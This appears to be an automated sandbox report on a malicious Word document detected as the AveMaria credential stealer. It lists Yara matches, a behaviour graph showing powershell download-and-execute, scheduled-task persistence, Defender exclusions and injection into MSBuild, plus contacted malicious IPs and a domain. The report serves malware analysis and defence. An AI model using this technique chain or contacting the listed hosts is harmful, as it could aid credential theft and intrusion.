Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Yara detected Credential Stealer
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 2360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MSBuild.exe PID: 2040, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 676, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1248, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AveMaria stealer
Source: Yara match File source: 29.2.explorer.exe.28d63b8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28e9850.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28e1ce0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28daffc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28d3db0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 17.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.explorer.exe.28e7248.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 29.2.explorer.exe.28dd604.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28daa94.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.28edf2c.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a0d418.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.explorer.exe.3a2b638.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 708250 Sample: Item Selection - Inquiry 00... Startdate: 23/09/2022 Architecture: WINDOWS Score: 100 74 Snort IDS alert for network traffic 2->74 76 Malicious sample detected (through community Yara rule) 2->76 78 Sigma detected: Scheduled temp file as task from temp location 2->78 80 17 other signatures 2->80 8 WINWORD.EXE 301 46 2->8         started        process3 dnsIp4 68 login.929389.ankura.us 159.223.2.212, 49171, 49172, 80 CELANESE-US United States 8->68 58 C:\Users\user\AppData\...\explorer[1].exe, PE32 8->58 dropped 60 C:\Users\user\AppData\...\DZdtfhgYgeghD{ .scT, data 8->60 dropped 62 C:\Users\user\AppData\Local\...\CA1522E6.png, 370 8->62 dropped 100 Document exploit detected (creates forbidden files) 8->100 102 Suspicious powershell command line found 8->102 104 Tries to download and execute files (via powershell) 8->104 106 2 other signatures 8->106 13 cmd.exe 8->13         started        15 cmd.exe 8->15         started        17 cmd.exe 8->17         started        19 5 other processes 8->19 file5 signatures6 process7 dnsIp8 24 explorer.exe 1 8 13->24         started        28 explorer.exe 2 15->28         started        30 explorer.exe 17->30         started        66 login.929389.ankura.us 19->66 52 C:\Users\user\AppData\Roaming\explorer.exe, PE32 19->52 dropped 82 Drops PE files with benign system names 19->82 84 Powershell drops PE file 19->84 86 Injects files into Windows application 19->86 file9 signatures10 process11 file12 54 C:\Users\user\AppData\...\eDdYRRbouy.exe, PE32 24->54 dropped 56 C:\Users\user\AppData\Local\...\tmpE14B.tmp, XML 24->56 dropped 88 Machine Learning detection for dropped file 24->88 90 Uses schtasks.exe or at.exe to add and modify task schedules 24->90 92 Writes to foreign memory regions 24->92 32 MSBuild.exe 3 2 24->32         started        36 powershell.exe 6 24->36         started        38 schtasks.exe 24->38         started        40 MSBuild.exe 24->40         started        94 Allocates memory in foreign processes 28->94 96 Adds a directory exclusion to Windows Defender 28->96 98 Injects a PE file into a foreign processes 28->98 42 powershell.exe 28->42         started        44 schtasks.exe 28->44         started        46 MSBuild.exe 28->46         started        48 powershell.exe 30->48         started        50 2 other processes 30->50 signatures13 process14 dnsIp15 64 20.126.95.155, 49173, 7800 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 32->64 70 Increases the number of concurrent connection per server for Internet Explorer 32->70 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 32->72 signatures16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
20.126.95.155
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS true
159.223.2.212
 login.929389.ankura.us United States
46118 CELANESE-US true

Contacted Domains

Name IP Active
login.929389.ankura.us 159.223.2.212 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
20.126.95.155 true
  • Avira URL Cloud: safe
 unknown